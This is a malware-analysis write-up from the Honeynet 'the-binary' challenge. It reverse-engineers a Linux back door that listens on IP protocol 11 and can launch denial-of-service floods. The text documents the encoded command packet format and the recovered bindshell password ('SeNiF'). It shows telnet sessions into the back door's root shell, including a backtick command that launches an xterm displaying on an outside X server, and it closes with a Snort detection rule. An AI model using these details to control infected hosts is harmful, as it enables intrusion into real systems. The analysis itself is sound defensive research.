Analysis: the-binary back door and DOS tool


sean.burford@adelaide.edu.au

29/May/2002

Approach:

  1. Tooling up
  2. The environment
  3. Downloading the binary
  4. Initial examination
  5. Disassembly
  6. Running the-binary
  7. A tool to test the-binary
  8. Decoding the protocol
  9. Working out the bindshell password
  10. Using Snort to detect the-binary command traffic
  11. What we have learnt about the binary

Tooling up

Unix tools: file(1), strings(1), objdump(1), gdb(1), perl(1), make(1L) and gcc(1)

The Reverse Engineering Compiler
REC was used to decompile the-binary to C-like structured code, which eased the identification of the program structure.
http://www.backerstreet.com/rec/rec.htm

Fenris
Can be used to regenerate the symbol table of a stripped ELF binary, and do a lot of other reverse engineering tasks.
http://razor.bindview.com/tools/fenris/

User Mode Linux
A reasonably safe environment for running and tracing the-binary.
http://user-mode-linux.sourceforge.net/

TCPDump
To monitor network traffic to and from the-binary, and analyse the DDOS functions.
http://www.tcpdump.org/

libnet
To generate packets to send to the-binary to verify functionality.
http://www.packetfactory.net/Projects/Libnet/

libpcap
To capture response packets from the-binary.
http://www.tcpdump.org/

Snort
A rule for the Snort Network Intrusion Detection System (NIDS) was created to detect control traffic for this binary, and others like it.
http://www.snort.org/

The Environment

The-binary was disassembled with objdump and REC under a standard RedHat Linux 7.1 install. C source was developed on the host using the libnet and libpcap libraries, in order to exercise the functionality of the-binary. User Mode Linux was installed to provide an environment for executing the-binary.

The-binary was tested under User Mode Linux (UML) using a virtual network consisting of addresses in the range 192.168.32.0/24. The infected host was configured at 192.168.32.200, with the client probing from the real host and tcpdump running on the real host. The-binary was largely disassembled before the first test run, to provide some assurance that it would not detect UML and attempt to exploit it to escape to the host OS, or perform other malicious actions. The initial disassembly was also required to determine the packet contents the-binary was expecting.

The drive images used under User Mode Linux were the standard User Mode Linux Debian Minimal and RedHat 7.2 full install images, which provided virtual systems for running and communicating with the-binary.

The host machine on which UML was run did not have any other active network interfaces, to prevent packets slipping out onto public networks.

This environment was designed to prevent network activity from the infected host from escaping beyond the host running the UML system.

Download the-binary and verify MD5 sum

Having downloaded the-binary.tar.gz from project.honeynet.org, I verified the MD5 checksum of the archive with the md5sum command, and it matched that shown on the web site.
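
The same check can be scripted. The following is a minimal sketch, assuming the archive is on local disk and the published checksum has been copied from the web site by hand; the function names are illustrative and not part of the submitted files.

```python
import hashlib


def md5_of_chunks(chunks):
    """Return the hex MD5 digest of an iterable of byte chunks."""
    digest = hashlib.md5()
    for chunk in chunks:
        digest.update(chunk)
    return digest.hexdigest()


def md5_of_file(path, chunk_size=65536):
    """Hash a file in fixed-size chunks so large files are not read at once."""
    with open(path, "rb") as handle:
        return md5_of_chunks(iter(lambda: handle.read(chunk_size), b""))


def matches_published(path, published_hex):
    """Compare a file's MD5 with a checksum string copied from elsewhere."""
    return md5_of_file(path) == published_hex.strip().lower()
```

A call such as matches_published("the-binary.tar.gz", checksum_from_site) would return True only if the archive matches the checksum shown on the site.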

Initial examination

The Unix file(1) command was used to identify the binary as a statically linked Linux i386 executable. strings(1) was used to examine the-binary for clues as to its purpose and composition. strings revealed that the-binary was probably linked against "The Linux C library 5.3.12", containing "yplib.c,v 2.6 1994/05/27". This library was present in RedHat Linux 6.2, but not RedHat Linux 6.1 or 7.0, so if this program was linked under RedHat, it was probably under RedHat 6.2. Also present are strings indicating that /bin/csh may be used to execute commands, and that /tmp/.hj237349 may be used at some point.

I ran "objdump -dS the-binary" to get a raw disassembly of the-binary for reference when REC did not produce the level of detail required.

Disassembly

I ran REC against the-binary to try to start finding functions and structure.

Initial disassembly with the Reverse Engineering Compiler, REC, revealed a lot of functions containing the "int 0x80" interrupt instruction. This interrupt is used by programs running under Linux to invoke kernel functions, called System Calls, with a command number in EAX.

There is a list of Linux system calls in /usr/include/asm/unistd.h. To determine the likely purpose of the functions in the REC output, I created a Perl script that would search for lines of REC output where EAX was set, followed by an int 0x80, and mark the interrupt with the system call name from unistd.h. This script is convert-syscall.pl in files.tar.
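
The idea behind that script can be sketched in a few lines. This is not convert-syscall.pl itself: it is a rough Python illustration that assumes objdump-style AT&T lines ("mov $0x2,%eax", "int $0x80") rather than REC output, and it embeds a short excerpt of the i386 system call numbers instead of reading unistd.h from disk. It only tracks the most recent immediate load into EAX, so anything that changes EAX in between will mislead it.

```python
import re

# Small excerpt of "#define __NR_<name> <number>" lines (i386 numbering).
UNISTD_EXCERPT = """\
#define __NR_exit 1
#define __NR_fork 2
#define __NR_read 3
#define __NR_write 4
#define __NR_open 5
#define __NR_close 6
#define __NR_socketcall 102
"""

DEFINE_RE = re.compile(r"#define\s+__NR_(\w+)\s+(\d+)")
SET_EAX_RE = re.compile(r"mov\s+\$0x([0-9a-fA-F]+),%eax")
INT80_RE = re.compile(r"int\s+\$0x80")


def load_syscalls(header_text):
    """Build a {number: name} table from unistd.h-style #define lines."""
    return {int(num): name for name, num in DEFINE_RE.findall(header_text)}


def annotate(lines, syscalls):
    """Append the system call name to each int $0x80 that follows an EAX load."""
    annotated = []
    eax = None
    for line in lines:
        match = SET_EAX_RE.search(line)
        if match:
            eax = int(match.group(1), 16)
        elif INT80_RE.search(line) and eax is not None:
            line = f"{line}    # {syscalls.get(eax, 'unknown')}"
            eax = None
        annotated.append(line)
    return annotated
```

Feeding it the two lines "mov $0x2,%eax" and "int $0x80" marks the interrupt as fork.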

Once I had determined the names of some of the library functions within the REC output, I added them to my REC command file. The argument lists for these commands came from their C header files in /usr/include/. At this point, my REC command file looked something like this:

#!wrec
file: the-binary
cpu: i386

option: +hexconst

region: 0x000090 0x01f5d0 0x08048090 text
region: 0x01f5d8 0x024228 0x080675d8 data
region: 0x024228 0x0302ac 0x0806d228 data

##############################
# Standard library functions #
##############################
symbol: 0x0804F620, 0x0804F67F T fopen(char *path, char *mode)
# INCOMPLETE TYPE
symbol: 0x0804F808, 0x0804F81F T sprintf(char *string, char *format)
# INCOMPLETE TYPE
symbol: 0x0804F820, 0x0804F884 T _IO_sprintf(char *string, char *format)
symbol: 0x08055FBC, 0x0805602B T _exit(int n)
symbol: 0x080569FC, 0x08056A2B T wait4(unsigned int pid, int *status, int options, void *rusage)
symbol: 0x08056A2C, 0x08056A71 T accept(int s, void *address, unsigned int *addrlen)
symbol: 0x08056A74, 0x08056AB9 T bind(int sockfd, void *myaddr, unsigned int *addrlen)
symbol: 0x08056ABC, 0x08056B01 T connect(int sockfd, void *serveraddr, unsigned int addrlen)
...

To aid in identifying and verifying further library functions, I downloaded the Linux libc 5.3.12 source and referred to it when I found a prospective library function.

Had I known of it, I could have avoided this time-intensive process by running dress(1) from the Fenris reverse engineering toolkit. Dress can regenerate the symbol table of a stripped ELF executable.

To find main() in the-binary, I examined the output of REC and found the ELF entry point function, labelled "__entry_point__". Reading through this standard function revealed a call to a larger function at 0x08048134, which I assumed to be main().
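
The entry point address that a disassembler starts from is stored in the ELF header, so it can also be read directly. The sketch below assumes a 32-bit ELF file, where the e_entry field sits at offset 0x18; the function name is illustrative.

```python
import struct


def elf32_entry_point(header):
    """Return e_entry from the first bytes of a 32-bit ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if header[4] != 1:  # EI_CLASS: 1 means 32-bit objects
        raise ValueError("not a 32-bit ELF file")
    # EI_DATA: 1 means little-endian, 2 means big-endian
    byte_order = "<" if header[5] == 1 else ">"
    (entry,) = struct.unpack_from(byte_order + "I", header, 0x18)
    return entry
```

Reading the first 52 bytes of the file (the size of the 32-bit ELF header) and passing them to elf32_entry_point() gives the address at which execution begins.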

In main(), the lead up to the first for loop contains calls to various functions and can be represented by the summary below:

  1. if euid is not root, exit.
  2. replace the process name in argv[0] with "[mingetty]"
  3. fork and exit the parent process.
  4. setsid()
  5. fork and exit the parent process.
  6. change to the / directory
  7. close file descriptors 0,1,2
  8. open a socket.
  9. receive datagrams.

I was interested in the encoding and decoding functions mentioned in the challenge questions. decode() was quickly found by examining the function calls following the call to recv() in main(). I looked here because you cannot do much with a command packet before decoding it. encode() was found by searching for the value 0x17 (a key value in the decode() function) in the rest of the disassembly.

The encode and decode functions are loaded into the following memory areas:
0x0804A194-0x0804A1E6: encode(int length, unsigned char *src, unsigned char *dst)
0x0804A1E8-0x0804A2A4: decode(int length, unsigned char *src, unsigned char *dst)
Their disassembly with REC was not too hard to follow, and is included in the files I have submitted.

Examining the functions reached by the goto statement shortly after the call to decode() revealed that some of them executed shell commands, that command 1 returned the PID of any children the server had forked, and that command 2 configured the server. The code before the goto revealed the format and usage of the first 4 bytes of the packet.

Running the-binary

Now that I knew that the-binary was a network daemon, and what some of its commands did, I ran the-binary under User Mode Linux. User Mode Linux is a Linux kernel that runs under Linux, allowing you to use a file on the host system as a disk drive containing the filesystem for UML.

When run under User Mode Linux, the-binary changes its process name, as visible in ps, to "[mingetty]". This is the name of a terminal program commonly found running on Unix machines, so this is an attempt to obscure the-binary in the process list. The "top" command still shows the original binary name ("the-binary") and /proc shows the-binary has a single open socket.

The-binary uses IP protocol 11 for communication. This evades simple searches for evidence of a compromise, such as TCP and UDP network scans by nmap, and basic interpretation of netstat output. IP services listening for protocol 11 are shown in the output of "netstat -an" as:

raw        0      0 0.0.0.0:11              0.0.0.0:*               7
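
A check for such listeners can be automated. The following is a minimal sketch that assumes the "netstat -an" column layout shown above, where the number after the colon in the local address of a raw socket is the IP protocol; the function name is illustrative.

```python
def raw_listener_protocols(netstat_output):
    """Return the IP protocol numbers of raw sockets in `netstat -an` output."""
    protocols = []
    for line in netstat_output.splitlines():
        fields = line.split()
        # Expected fields: proto, recv-q, send-q, local address, foreign address, state
        if len(fields) >= 4 and fields[0] == "raw":
            _, _, proto = fields[3].rpartition(":")
            if proto.isdigit():
                protocols.append(int(proto))
    return protocols
```

Any value other than the protocols a host is expected to use on raw sockets (for example 1 for ICMP) deserves a closer look.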

A list of supported protocols on a machine can be found with the nmap (http://www.insecure.org/nmap/) protocol scan; however, this could be fooled by having the back door send an ICMP protocol unreachable packet in response to malformed command packets. Nmap -sO outputs the following line when it detects protocol 11:

11         open        nvp-ii                  

A tool to test the-binary

Using libnet and libpcap, I put together a tool to construct command packets for the-binary based on the packet format I worked out from the REC disassembly, and another to dump the packets. By throwing these packets at the-binary and observing it with gdb, I was able to work out almost all of the functionality it provides. These two tools are called pingit.c and dumpit.c, and are included in the attached archive. Running tcpdump in another window allowed me to see the DOS floods when they started.

I rewrote pingit.c to accept parameters from the command line. This new program is called the-client, and it allows control of most aspects of packets being sent to the-binary. the-client.c is also included in the attached files. It does not support a couple of the flood request types, and does not properly receive response packets yet.

Decoding the protocol

Using the REC disassembly and my tools (dumpit, pingit and the-client), I was able to determine the packet format for all 12 commands and responses.

All command and response packets have a standard IP packet header, which specifies protocol 11. The first word (two bytes) of the data area is an unencoded command/response flag. The rest of the data area is encoded using the encode() function detailed elsewhere in this analysis. The first encoded byte is ignored by the receiver, and can be used to salt the encode() function so that a repeated command can take up to 256 different appearances on the wire. The next byte is the command byte, a number between 1 and 12 that specifies the function being called. The rest of the packet is data for the command.

  0x00        0x14        0x16
  +-----------+-----+-----+-----+-----+----...
  | IP Header | XXX | DIR | SLT | CMD | ARGS
  +-----------+-----+-----+-----+-----+----...
offset
0          IP Header
0x14       XXX Unknown
0x15       DIR Direction:  02 Command
                           03 Response
                           04 Response Continuation
------ Everything after here encoded -------------
0x16       SLT Salt
0x17       CMD Command number
0x18...    ARGS Variable length parameters for CMD
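
The layout above can be expressed as a pair of helper functions. This is a sketch only: offsets are relative to the start of the data area (that is, after a 20 byte IP header), and the encode and decode arguments are identity stand-ins, because the real cipher is described elsewhere in this analysis and is not reproduced here. All names are illustrative and do not come from the-client.c or pingit.c.

```python
DIR_COMMAND = 0x02
DIR_RESPONSE = 0x03
DIR_CONTINUATION = 0x04


def build_data_area(cmd, args=b"", salt=0, unknown=0, encode=lambda data: data):
    """Assemble XXX, DIR, then the encoded SLT, CMD and ARGS bytes."""
    if not 1 <= cmd <= 12:
        raise ValueError("command number must be between 1 and 12")
    clear = bytes([salt & 0xFF, cmd]) + bytes(args)
    return bytes([unknown & 0xFF, DIR_COMMAND]) + encode(clear)


def split_data_area(data, decode=lambda data: data):
    """Split a received data area into its named fields."""
    if len(data) < 4:
        raise ValueError("data area too short")
    clear = decode(data[2:])  # everything after DIR is encoded on the wire
    return {
        "unknown": data[0],
        "direction": data[1],
        "salt": clear[0],
        "cmd": clear[1],
        "args": clear[2:],
    }
```

With the identity stand-ins, build_data_area(1, salt=0x5A) yields the four bytes 00 02 5A 01, which corresponds to the status command with the salt left unencoded.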

Example packet and response: command 1: status
   Accepts no parameters
     0x00        0x14      0x16
     +-----------+----+----+----+----+----...
     | IP Header | 00 | 02 | XX | 01 |
     +-----------+----+----+----+----+----...
offset
0x17       CMD Command number = 1

   Returns PID of currently executing shell or flood process.
     0x00        0x14      0x16
     +-----------+----+----+----+----+-----+------+-...
     | IP Header | 00 | 03 | XX | 01 | CHL | PID  |
     +-----------+----+----+----+----+-----+------+-...
offset
0x17       CMD Command number = 1
0x18       CHL Flag to indicate if there is a child running
           00 = no child process
           01 = child process
0x19,0x1A  PID Process ID of child process

The rest of the packet formats can be seen in the-client.c and pingit.c.

Working out the bindshell password

Examining the REC disassembly of the bindshell function (CMD_06) reveals that a connection is accepted, the string sent by the client is compared with the value 'TfOjG', and if the strings match the remote user is dropped into a shell.

I used the-client to launch the bindshell, and checked the protocol and port on the host running the-binary with netstat -an. I saw a new port had been opened:

tcp        0      0 0.0.0.0:23281           0.0.0.0:*               LISTEN      

As it is TCP, we can use telnet to connect. I connected and tried the password 'TfOjG', but got no response. Looking at the code, newline characters (0x0a and 0x0d in hex) are translated to '\0', so I tried a few newlines after the password with no luck. Re-examining the disassembly revealed that the password was obfuscated: each submitted character is incremented by one before the comparison. I reconnected and tried the password 'SeNiF' followed by spaces, again with no luck. I decided to use gdb to compare the strings myself as the-binary saw them.

The disassembly shows that the code forks twice in CMD_06, once after the function is entered so that the main loop can continue processing other commands, and once after accept is called. This could have made interactive disassembly with gdb difficult, as I had already noticed that follow-fork-mode was ineffective, possibly because the-binary was statically linked. Luckily, just after the second fork recv() is called.

As recv() blocks until it receives input, I connected to the bindshell with telnet. This got the bindshell process up to the recv() call. Using ps I found the process ID of the forked shell, and fired up gdb.

bash-2.05# ps ax | fgrep mingetty
  417 tts/0    S      0:00 /sbin/mingetty serial/0
  454 ?        S      0:00 [mingetty]  
  507 ?        S      0:00 [mingetty]  
  508 ?        S      0:00 [mingetty]  
(gdb) attach 508
Attaching to process 508
0x08056b74 in ?? ()
(gdb) bt
#0  0x08056b74 in ?? ()
#1  0x080489cf in ?? ()
#2  0x080480eb in ?? ()
(gdb) disassemble 0x080489cf 0x08048a1b
Dump of assembler code from 0x80489cf to 0x8048a1b:
0x80489cf:      xor    %ebx,%ebx
0x80489d1:      add    $0x10,%esp
0x80489d4:      mov    0xffffbc44(%ebx,%ebp,1),%al
0x80489db:      cmp    $0xa,%al
0x80489dd:      je     0x80489e3
0x80489df:      cmp    $0xd,%al
0x80489e1:      jne    0x80489f0
0x80489e3:      movb   $0x0,0xffffbc44(%ebx,%ebp,1)
0x80489eb:      jmp    0x80489fe
0x80489ed:      lea    0x0(%esi),%esi
0x80489f0:      mov    %al,0xffffbc44(%ebx,%ebp,1)
0x80489f7:      incb   0xffffbc44(%ebx,%ebp,1)
0x80489fe:      inc    %ebx
0x80489ff:      cmp    $0x12,%ebx
0x8048a02:      jle    0x80489d4
0x8048a04:      lea    0xffffbc44(%ebp),%esi
0x8048a0a:      mov    $0x8067617,%edi
0x8048a0f:      mov    $0x6,%ecx
0x8048a14:      cld    
0x8048a15:      test   $0x0,%al
0x8048a17:      repz cmpsb %es:(%edi),%ds:(%esi)
0x8048a19:      je     0x8048a44
End of assembler dump.
(gdb) break *0x8048a0f
Breakpoint 1 at 0x8048a0f
(gdb) cont
Continuing.

Typing 'SeNiF' into telnet followed by a few spaces causes the breakpoint to be reached, and I compare the password from the network to the password in the binary:

Breakpoint 1, 0x08048a0f in ?? ()
(gdb) x/10c 0xffffbc44+$ebp
0x9fffb7e8:     84 'T'  102 'f' 79 'O'  106 'j' 71 'G'  33 '!'  33 '!'  33 '!'
0x9fffb7f0:     33 '!'  33 '!'
(gdb) x/10c 0x8067617
0x8067617:      84 'T'  102 'f' 79 'O'  106 'j' 71 'G'  0 '\000'        -1 'ÿ' -5 'û'
0x806761f:      1 '\001'        0 '\000'

So the password is correct. The problem appears to be that 6 characters are compared and the password is only 5 characters long, so I needed a trailing null byte. As newlines are translated to null bytes, all I needed to do was press Enter after typing the password. I restarted the bindshell with the-client, reconnected with telnet and typed SeNiF followed by Enter. This worked: when I pressed Enter a second time, I got the response ": command not found".

[slide@slide reverse]$ sudo ./the-client -i tap0 -s 192.168.32.1 -d 192.168.32.200 stop
Cmd: 8  Resp?: 0        Bind?: 0        Proto: 11
Body: 400       Wait: 500       Device: tap0    ttl: 250        Unk: 0
Source: 192.168.32.1    Dest: 192.168.32.200
[slide@slide reverse]$ sudo ./the-client -i tap0 -s 192.168.32.1 -d 192.168.32.200 bindshell
Cmd: 6  Resp?: 0        Bind?: 1        Proto: 11
Body: 400       Wait: 500       Device: tap0    ttl: 250        Unk: 0
Source: 192.168.32.1    Dest: 192.168.32.200
STUB: no bindshell support yet
[slide@slide reverse]$ telnet 192.168.32.200 23281
Trying 192.168.32.200...
Connected to 192.168.32.200.
Escape character is '^]'.
SeNiF

: command not found
ls
: command not found
echo hi
hi
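
The password check traced in gdb above can be modelled in a few lines. This is a sketch of the loop at 0x80489d4 and the six byte comparison at 0x8048a17, not code taken from the-binary. It assumes that bytes beyond the received data are zero, which is a simplification because the real buffer contents there are not known.

```python
STORED = b"TfOjG\x00"  # six bytes compared by repz cmpsb (ecx = 6)
BUFFER_LEN = 0x13      # the loop runs while ebx <= 0x12


def transform(received):
    """Apply the per-byte transformation seen in the disassembly."""
    # Assumption: unused buffer bytes are zero (unknown in the real process).
    buf = bytearray(received[:BUFFER_LEN].ljust(BUFFER_LEN, b"\x00"))
    for i in range(BUFFER_LEN):
        if buf[i] in (0x0A, 0x0D):
            buf[i] = 0                     # newline characters become NUL
        else:
            buf[i] = (buf[i] + 1) & 0xFF   # incb: add one, wrapping at 256
    return bytes(buf)


def accepts(received):
    """True if the transformed input matches the stored string and its NUL."""
    return transform(received)[:len(STORED)] == STORED
```

Under this model, accepts(b"SeNiF\r\n") is True, while b"SeNiF" followed by spaces is rejected because each space becomes '!' (0x21), matching the buffer contents shown by gdb.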

As it turns out, the shell is pretty useless because it cannot find any non-builtin commands. This can be overcome (if you don't mind possibly giving away your IP address to the owner of the compromised system) by using xhost on an X server to allow access from the compromised host, and starting an xterm that displays on that X server, e.g.:

[slide@slide reverse]$ telnet 192.168.32.200 23281
Trying 192.168.32.200...
Connected to 192.168.32.200.
Escape character is '^]'.
SeNiF
echo `/usr/X11R6/bin/xterm -display 192.168.32.254:0`

This exploits the builtin echo command and the `` (backtick) quotes, which together can be used to run a command from the bindshell.

Using Snort to detect the-binary command traffic

As the-binary is controlled by packets using an unusual protocol, I decided that this was a good way to detect the network traffic related to this program and others like it. Since Snort (an Open Source network intrusion detection system) has an easy to use rule system for configuring its alerts, I decided to prototype this with Snort.

Snort is configured using rule files. The rule files list rules that can specify which packets and data flows to match, and what to tell the Snort user about those packets.

At first glance, I could not find any way to specify how to monitor for particular IP protocols in the Snort documentation. A bit of research uncovered the ip_proto keyword. I created and tested the rule:

alert ip $EXTERNAL_NET any <> $HOME_NET 0 (msg:"Traffic on unusual IP protocol"; ip_proto: !6; ip_proto: !17; ip_proto: !1; classtype:misc-activity; rev:1;)
which detected the traffic. I tried adding more protocols to the exclusion list, but Snort started detecting all traffic so I left it at that. The greater than (>) operator does not seem to work with ip_proto, and it does not seem to be able to handle lists. In a production environment you would need to ignore 5 or so major protocols (TCP, UDP, ICMP, IGRP, various routing protocols such as OSPF) to cut down on false positives. Protocol numbers are assigned by IANA and available at
http://www.iana.org/assignments/protocol-numbers
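
The test that the rule performs can be illustrated outside Snort. The sketch below is not Snort code: it reads the protocol field at byte 9 of an IPv4 header and reports anything outside a set of expected protocols, which sidesteps the list limitation noted above. The names and the default set are illustrative.

```python
EXPECTED_PROTOCOLS = frozenset({1, 6, 17})  # ICMP, TCP, UDP


def ip_protocol(packet):
    """Return the protocol number from the start of a raw IPv4 packet."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    return packet[9]  # the protocol field is the tenth byte of the header


def is_unusual(packet, expected=EXPECTED_PROTOCOLS):
    """True if the packet uses a protocol outside the expected set."""
    return ip_protocol(packet) not in expected
```

A production list would add further entries to the expected set, such as 89 for OSPF, to reduce false positives.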

What we have learnt about the binary

The-binary is a back door program. It acts as a network server, listening on IP protocol 11. Command and response packets are encoded using a simple cipher.

It provides facilities to execute shell commands using /bin/csh and /bin/sh as root on the compromised system, and the ability to launch a variety of Denial of Service (DOS) attacks.